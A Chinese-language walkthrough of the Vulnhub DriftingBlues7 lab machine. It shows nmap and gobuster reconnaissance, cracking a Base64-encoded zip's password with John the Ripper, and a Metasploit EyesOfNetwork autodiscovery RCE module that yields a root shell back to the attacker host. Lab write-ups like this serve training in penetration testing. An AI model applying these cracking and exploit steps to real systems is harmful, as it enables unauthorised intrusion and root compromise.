靶机渗透实战-Vulnhub-Driftingblues7

主机发现

不需要主机发现,IP为222.24.6.94。

信息收集

1
nmap -sV -A -p- -T4 222.24.6.94

回显如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 17:34 CST
Nmap scan report for 222.24.6.94
Host is up (0.000029s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
|   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
|_  256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
66/tcp   open  http            SimpleHTTPServer 0.6 (Python 2.7.5)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.5
|_http-title: Scalable Cost Effective Cloud Storage for Developers
80/tcp   open  http            Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
|_http-title: Did not follow redirect to https://222.24.6.94/
111/tcp  open  rpcbind         2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
443/tcp  open  ssl/http        Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
| http-title: EyesOfNetwork
|_Requested resource was /login.php##
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-04-03T14:37:22
|_Not valid after:  2022-04-03T14:37:22
|_ssl-date: TLS randomness does not represent time
2403/tcp open  taskmaster2000?
3306/tcp open  mysql           MariaDB (unauthorized)
8086/tcp open  http            InfluxDB http admin 1.7.9
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 139.60 seconds

HTTP

1
gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://222.24.6.94:66/

回显:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://222.24.6.94:66/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index_files          (Status: 301) [Size: 0] [--> /index_files/]
/eon                  (Status: 200) [Size: 248]
Progress: 123910 / 220561 (56.18%)[ERROR] Get "http://222.24.6.94:66/93867": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 135096 / 220561 (61.25%)[ERROR] Get "http://222.24.6.94:66/176082": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 143778 / 220561 (65.19%)[ERROR] Get "http://222.24.6.94:66/prack": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/jari": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 143780 / 220561 (65.19%)[ERROR] Get "http://222.24.6.94:66/pimpfish": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 152016 / 220561 (68.92%)[ERROR] Get "http://222.24.6.94:66/WIN": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 158311 / 220561 (71.78%)[ERROR] Get "http://222.24.6.94:66/stage1-hppa2": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207020 / 220561 (93.86%)[ERROR] Get "http://222.24.6.94:66/business_transformation": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207021 / 220561 (93.86%)[ERROR] Get "http://222.24.6.94:66/bt_down": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/OldSkool": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/30735": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207024 / 220561 (93.86%)[ERROR] Get "http://222.24.6.94:66/20061129141118antivirus-gratuits": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/vulnerabilites": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/warner_music": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/general_biometrics": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14199": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14186": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207030 / 220561 (93.87%)[ERROR] Get "http://222.24.6.94:66/14203": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207031 / 220561 (93.87%)[ERROR] Get "http://222.24.6.94:66/14204": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/20957": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14240": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 207034 / 220561 (93.87%)[ERROR] Get "http://222.24.6.94:66/14288": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14253": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/invio": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/14320": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/unlimited_screen": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://222.24.6.94:66/itunderground": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 215326 / 220561 (97.63%)[ERROR] Get "http://222.24.6.94:66/Null": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

扫出来两个有用的路由,不知道为啥靶机在本地还能这么慢。

访问路由/eon,下载到一个Base64,解码后压缩包爆破密码:

1
2
3
4
cat ./eon | base64 -d >asdf.zip
zip2john asdf.zip > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
unzip -p killah ./asdf.zip

拿着解密后的去后台,成功登录。

看到版本为EyesOfNetwork 5.3。

MSF+提权

1
2
3
4
5
6
7
search eyesofnetwork
use exploit/linux/http/eyesofnetwork_autodiscovery_rce
show options
set rhosts 222.24.6.94
set lhost 222.24.6.149
exploit
shell

不需要提权,root直接给。

1
cat /root/flag.txt